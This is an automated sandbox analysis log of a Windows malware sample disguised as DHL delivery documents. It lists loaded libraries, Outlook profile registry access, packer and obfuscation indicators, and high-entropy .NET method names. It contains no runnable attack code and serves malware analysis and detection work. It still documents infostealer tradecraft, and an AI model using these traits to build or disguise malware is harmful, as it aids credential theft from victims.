            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: DHL_Delivery Documents.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: DHL_Delivery Documents.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: DHL_Delivery Documents.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3278494163.000000000060E000.00000002.00000001.01000000.0000000A.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3278640060.000000000060E000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2632462016.0000000002882000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2634170956.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL_Delivery Documents.exe, DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, setx.exe, 00000012.00000003.2632462016.0000000002882000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2634170956.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: setx.pdbGCTL source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279344083.0000000001228000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: setx.pdb source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279344083.0000000001228000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: JeWB.pdbSHA256 source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr
            Source: Binary string: JeWB.pdb source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: DHL_Delivery Documents.exe, BufferingPage.cs.Net Code: InitializeComponent
            Source: YybGLWQSx.exe.0.dr, BufferingPage.cs.Net Code: InitializeComponent
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.cs.Net Code: PHLl19SWnJ System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RU6c2kU9YKG76GBYRe.cs.Net Code: PHLl19SWnJ System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL_Delivery Documents.exe.5350000.3.raw.unpack, LoginForm.cs.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
            Source: 18.2.setx.exe.320cd08.2.raw.unpack, BufferingPage.cs.Net Code: InitializeComponent
            Source: 19.0.OoIHIwIlaOHZFTFWeSHYCjEJ.exe.280cd08.1.raw.unpack, BufferingPage.cs.Net Code: InitializeComponent
            Source: 19.2.OoIHIwIlaOHZFTFWeSHYCjEJ.exe.280cd08.1.raw.unpack, BufferingPage.cs.Net Code: InitializeComponent
            Source: DHL_Delivery Documents.exeStatic PE information: 0xDBE1BAC7 [Sun Nov 24 19:15:19 2086 UTC]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 0_2_02C147B1 push ebp; ret 0_2_02C14815
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_0041483F push ds; iretd 8_2_00414840
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_00405256 push cs; retf 8_2_0040525E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_00418BCE push ds; iretd 8_2_00418BCF
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004063BD push edi; ret 8_2_004063BE
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_00404CD3 push dword ptr [edx+08391132h]; iretd 8_2_00404D17
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004124FD push eax; ret 8_2_004124FE
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_00403490 push eax; ret 8_2_00403492
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_00404D01 push dword ptr [edx+08391132h]; iretd 8_2_00404D17
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_0041CDFC pushad ; ret 8_2_0041CDF6
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_0041CDBE pushad ; ret 8_2_0041CDF6
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_0040CFCC push esp; ret 8_2_0040CFCD
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01BE225F pushad ; ret 8_2_01BE27F9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01BE27FA pushad ; ret 8_2_01BE27F9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C109AD push ecx; mov dword ptr [esp], ecx8_2_01C109B6
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01BE283D push eax; iretd 8_2_01BE2858
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01BE1368 push eax; iretd 8_2_01BE1369
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 9_2_04A1F438 push eax; iretd 9_2_04A1F439
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0162C54F push 8B015B67h; ret 13_2_0162C554
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0162C54D pushfd ; ret 13_2_0162C54E
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0162C9D7 push edi; ret 13_2_0162C9D9
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015E09AD push ecx; mov dword ptr [esp], ecx13_2_015E09B6
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015B1FEC push eax; iretd 13_2_015B1FED
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_01637E99 push ecx; ret 13_2_01637EAC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeCode function: 17_2_02FDEA8F push ds; iretd 17_2_02FDEA90
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeCode function: 17_2_02FE924D push DCA6106Ah; iretd 17_2_02FE9254
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeCode function: 17_2_02FD721C push esp; ret 17_2_02FD721D
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeCode function: 17_2_02FE2A11 push ds; ret 17_2_02FE2A12
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeCode function: 17_2_02FE704C pushad ; ret 17_2_02FE7046
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeCode function: 17_2_02FE700E pushad ; ret 17_2_02FE7046
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeCode function: 17_2_02FE2E1E push ds; iretd 17_2_02FE2E1F
            Source: DHL_Delivery Documents.exeStatic PE information: section name: .text entropy: 7.036454178640072
            Source: YybGLWQSx.exe.0.drStatic PE information: section name: .text entropy: 7.036454178640072
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, AbRlcZD5I4DdphA7Ht.csHigh entropy of concatenated method names: 'BT3xmq3GYn', 'sKHxTgGoLu', 'olfxwB7MpT', 'IiGxe6r2jE', 'Lw5xr6bNpq', 'Ml9xBBiKpK', 'NlGx7CtvYM', 'bnmxnnpSCg', 'nkwxE291MO', 'oSbxaW2IWV'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, SJ926WTpoKiyGmVNYm.csHigh entropy of concatenated method names: 'kD9NM3WXem', 'iiDNbAsWSW', 'ICgNm0klnE', 'qiGNTfEBuT', 'vxUNdFrUba', 'TDKNHVhTSk', 'GeTNCra2Sa', 'nnQNGeb0rM', 'jFYNPKp5CX', 'V1pNcks5FO'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, Y5jh8ihuuv6mXkApNQ.csHigh entropy of concatenated method names: 'yna0jYDgZx', 'O020Z02YA0', 'DQ3014KMss', 'KMN0MffN61', 'VZy0vHZTEm', 'B6b0basyXQ', 'h970RLPmuL', 'PoZ0mgXW9c', 'hEB0TK8okK', 'cb70uc4GYN'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, kxpixr3uPAMKj5Q2Cq.csHigh entropy of concatenated method names: 'HW2CXHchXA', 'unmCVpWX90', 'rMDG9PRnGw', 'HWWG6bhwcu', 'SxSCaPjjBf', 'bqdCor2ru2', 'xZZCDI5PA3', 'HF8Cyo0Gkh', 'oi5CkM3nAa', 'a0hCg4UtUa'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, n6ldLBu5fDp4pNHO3y.csHigh entropy of concatenated method names: 'ISY2vxQrCO', 'lVa2RJrTht', 'NSAN5YmlCe', 'fKtNrpTtf0', 'qRsNBFsMul', 'mRnNAP3Vse', 'OCpN7vctPk', 'rkXNn3S16O', 'X4oNhUAH7m', 'r0lNEpbXFf'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.csHigh entropy of concatenated method names: 'bMrSL4bdYS', 'SsnSQ8mBeR', 'L5NS8MwTtg', 'G1WSNn2jrX', 'YkQS2UbQ0v', 'j9eSW6wIAj', 'hpfS0rvfQ5', 'D3LSU6Bd0T', 'qkdSpxNbt5', 'zNUSOWm1DF'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, GEk4CQV1nkYogPRIP5.csHigh entropy of concatenated method names: 'BADP64JYIA', 'H9hPSQUFuR', 'jq9PlICkKx', 'FcBPQWcGO6', 'j5lP8WGPAD', 'I6kP295Ua0', 'uvpPW0TIWe', 'YYiGFfe1wx', 'bUFGX1gsnU', 'AsoGtPFfoi'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, hPpbPxy7qlsZaQYrUl.csHigh entropy of concatenated method names: 'NUOdEmsWwP', 'QZ7do70DJ5', 'wj3dyra6Ic', 'XrWdkLLiDc', 'agIdegtELY', 'woVd54n59C', 'VvhdrIWOM9', 'AwydBsO4OX', 'DcwdAA72pT', 'Krvd72teGR'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, kdd45aqdIHvmOw72Wh.csHigh entropy of concatenated method names: 'vwG1OW6mh', 'jNlMqG6pF', 'EeebXlKQC', 'FBPRDG6Iv', 'hIUTrO6rr', 'hhZuZnBcT', 'xa4LdIIC6IAOLLBeiR', 'N7A8077lpQmG4NLM8T', 'LvwGOeWnO', 'y9Vc8DToi'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RxkmdA69PTFuhRfPXeX.csHigh entropy of concatenated method names: 'advPjKSrex', 'rMjPZggM78', 'S44P1MHTsT', 'PHgPMxuFOG', 'gMuPvhfsml', 'PpvPbMTrbr', 'iPpPRsOkn5', 'aJcPmnS6fN', 'QGuPTVCRdG', 'aXEPuqKoqQ'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, SFlTW26StfpklInMEh0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'I0IcyJY6Ol', 'UYockUYD0t', 'mLqcgC0MOU', 'v9bcfr0uEg', 'TiDcJsOY82', 'cCrc3r9rd6', 'TPdcFcSJBA'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, jO3Tf3X7vkYNwGYAPE.csHigh entropy of concatenated method names: 'JAkGQku8Ku', 'ziQG8v403L', 'xIFGN8UfhC', 'oRTG2qlitJ', 'PCSGWWGWji', 'GNqG06W3Z5', 'wSyGUXfwEe', 'eQyGpA1q1o', 'iVZGOsKRtL', 'ABhGYtx0oH'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, yjA8AJ8FAEvC4Ibgo1.csHigh entropy of concatenated method names: 'Dispose', 'nS16ts6l5t', 'TT8qeruNSO', 'AcWOOMTBrN', 'Y0O6V3Tf37', 'AkY6zNwGYA', 'ProcessDialogKey', 'sEZq97GEca', 'jvLq6ObKcN', 'LxSqqwEk4C'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, XPVT9YwdK4GfnPIrg7.csHigh entropy of concatenated method names: 'hQAWL0kvSP', 'Sd3W8CUqC3', 'AgHW2kw0x0', 'j91W0EoWPk', 'sGSWU3yF1k', 'Wrj2Je1Ftb', 'eqP23FW5Iq', 'tAo2F34GXa', 'aF32XtoCmC', 'Ewu2trLGwg'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, z7GEcat0vLObKcNnxS.csHigh entropy of concatenated method names: 'DCeGwQMc53', 'cpRGeTu8Wm', 'SdPG5lvP1I', 'QOdGrNYvbY', 'r28GylScLZ', 'feiGBmaYKf', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, W3yVFhmE2W66Gxi81U.csHigh entropy of concatenated method names: 'ch88ysMWLB', 'TAf8kbr2EC', 'lJr8geZMUs', 'NjP8fPEvxf', 'ecS8JXBuDi', 'eRu830v3hJ', 'KOO8FquaWt', 'mgv8XG0Pqe', 'lC98tCWWRV', 'kP18VxtKk5'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, AlPV4878XS9e8K3aHI.csHigh entropy of concatenated method names: 'Km90Q3RKa5', 'IwD0NYQhwE', 'isX0Wc5hG9', 'jcNWVEPMED', 'XuFWzk15Vj', 'QQi093tlPI', 'XMU06AoWnM', 'rF50qFXpSy', 'Pfl0SjbFuk', 'CA20lcbKcs'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, nCnGfHzpr4cbYfCxmv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Nx6PxtEyZU', 'a0OPdQN0Hq', 'Fj9PHm81if', 'Jy2PCsej4w', 'Ad0PGhjdTf', 'E5RPP2Sggj', 'i6ZPcrbrd5'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, A2h86JlramnZ7u93tE.csHigh entropy of concatenated method names: 'OyF603yVFh', 'N2W6U66Gxi', 'ipo6OKiyGm', 'YNY6Ymx6ld', 'gHO6d3ytPV', 'E9Y6HdK4Gf', 'v4Ru7jR2ePxAFprqWn', 'FdSQy9Tn1oP85Qapxr', 'nBC66U8qXp', 'm8J6SaRd08'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, AbRlcZD5I4DdphA7Ht.csHigh entropy of concatenated method names: 'BT3xmq3GYn', 'sKHxTgGoLu', 'olfxwB7MpT', 'IiGxe6r2jE', 'Lw5xr6bNpq', 'Ml9xBBiKpK', 'NlGx7CtvYM', 'bnmxnnpSCg', 'nkwxE291MO', 'oSbxaW2IWV'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, SJ926WTpoKiyGmVNYm.csHigh entropy of concatenated method names: 'kD9NM3WXem', 'iiDNbAsWSW', 'ICgNm0klnE', 'qiGNTfEBuT', 'vxUNdFrUba', 'TDKNHVhTSk', 'GeTNCra2Sa', 'nnQNGeb0rM', 'jFYNPKp5CX', 'V1pNcks5FO'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, Y5jh8ihuuv6mXkApNQ.csHigh entropy of concatenated method names: 'yna0jYDgZx', 'O020Z02YA0', 'DQ3014KMss', 'KMN0MffN61', 'VZy0vHZTEm', 'B6b0basyXQ', 'h970RLPmuL', 'PoZ0mgXW9c', 'hEB0TK8okK', 'cb70uc4GYN'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, kxpixr3uPAMKj5Q2Cq.csHigh entropy of concatenated method names: 'HW2CXHchXA', 'unmCVpWX90', 'rMDG9PRnGw', 'HWWG6bhwcu', 'SxSCaPjjBf', 'bqdCor2ru2', 'xZZCDI5PA3', 'HF8Cyo0Gkh', 'oi5CkM3nAa', 'a0hCg4UtUa'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, n6ldLBu5fDp4pNHO3y.csHigh entropy of concatenated method names: 'ISY2vxQrCO', 'lVa2RJrTht', 'NSAN5YmlCe', 'fKtNrpTtf0', 'qRsNBFsMul', 'mRnNAP3Vse', 'OCpN7vctPk', 'rkXNn3S16O', 'X4oNhUAH7m', 'r0lNEpbXFf'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RU6c2kU9YKG76GBYRe.csHigh entropy of concatenated method names: 'bMrSL4bdYS', 'SsnSQ8mBeR', 'L5NS8MwTtg', 'G1WSNn2jrX', 'YkQS2UbQ0v', 'j9eSW6wIAj', 'hpfS0rvfQ5', 'D3LSU6Bd0T', 'qkdSpxNbt5', 'zNUSOWm1DF'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, GEk4CQV1nkYogPRIP5.csHigh entropy of concatenated method names: 'BADP64JYIA', 'H9hPSQUFuR', 'jq9PlICkKx', 'FcBPQWcGO6', 'j5lP8WGPAD', 'I6kP295Ua0', 'uvpPW0TIWe', 'YYiGFfe1wx', 'bUFGX1gsnU', 'AsoGtPFfoi'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, hPpbPxy7qlsZaQYrUl.csHigh entropy of concatenated method names: 'NUOdEmsWwP', 'QZ7do70DJ5', 'wj3dyra6Ic', 'XrWdkLLiDc', 'agIdegtELY', 'woVd54n59C', 'VvhdrIWOM9', 'AwydBsO4OX', 'DcwdAA72pT', 'Krvd72teGR'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, kdd45aqdIHvmOw72Wh.csHigh entropy of concatenated method names: 'vwG1OW6mh', 'jNlMqG6pF', 'EeebXlKQC', 'FBPRDG6Iv', 'hIUTrO6rr', 'hhZuZnBcT', 'xa4LdIIC6IAOLLBeiR', 'N7A8077lpQmG4NLM8T', 'LvwGOeWnO', 'y9Vc8DToi'
